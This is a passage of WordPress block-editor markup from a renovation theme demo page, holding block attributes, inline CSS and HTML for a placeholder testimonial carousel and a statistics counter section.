Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"a3befb9c\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-a3befb9c button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-a3befb9c ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-a3befb9c .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-a3befb9c\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-a3befb9c\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"22dd1eee-7285-4179-aade-c75e623dc5ff\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-22dd1eee-7285-4179-aade-c75e623dc5ff background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-22dd1eee-7285-4179-aade-c75e623dc5ff .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-22dd1eee-7285-4179-aade-c75e623dc5ff.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-22dd1eee-7285-4179-aade-c75e623dc5ff.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-22dd1eee-7285-4179-aade-c75e623dc5ff .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-22dd1eee-7285-4179-aade-c75e623dc5ff.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"1b743d1a-88fb-41ab-9226-15cebed4b7ec\"} -->\n<style type=\"text/css\"> .block-1b743d1a-88fb-41ab-9226-15cebed4b7ec .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-1b743d1a-88fb-41ab-9226-15cebed4b7ec .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1b743d1a-88fb-41ab-9226-15cebed4b7ec .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1b743d1a-88fb-41ab-9226-15cebed4b7ec .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1b743d1a-88fb-41ab-9226-15cebed4b7ec .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1b743d1a-88fb-41ab-9226-15cebed4b7ec .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1b743d1a-88fb-41ab-9226-15cebed4b7ec .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1b743d1a-88fb-41ab-9226-15cebed4b7ec skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"92ed435d-0f4b-4b09-ad94-0c7a6b004857\"} -->\n<style type=\"text/css\"> .block-92ed435d-0f4b-4b09-ad94-0c7a6b004857 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-92ed435d-0f4b-4b09-ad94-0c7a6b004857 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-92ed435d-0f4b-4b09-ad94-0c7a6b004857 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-92ed435d-0f4b-4b09-ad94-0c7a6b004857 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-92ed435d-0f4b-4b09-ad94-0c7a6b004857 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-92ed435d-0f4b-4b09-ad94-0c7a6b004857\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"25a37383-8347-4a29-8fee-8ba89b771f16\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-25a37383-8347-4a29-8fee-8ba89b771f16 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"02a79cad-c29f-4570-98e5-7b94638959e4\"} -->\n<style type=\"text/css\"> .block-02a79cad-c29f-4570-98e5-7b94638959e4 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-02a79cad-c29f-4570-98e5-7b94638959e4 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-02a79cad-c29f-4570-98e5-7b94638959e4 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-02a79cad-c29f-4570-98e5-7b94638959e4 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-02a79cad-c29f-4570-98e5-7b94638959e4 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-02a79cad-c29f-4570-98e5-7b94638959e4\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"5e59b298-d780-4209-b22a-80f2d01b659f\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5e59b298-d780-4209-b22a-80f2d01b659f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n 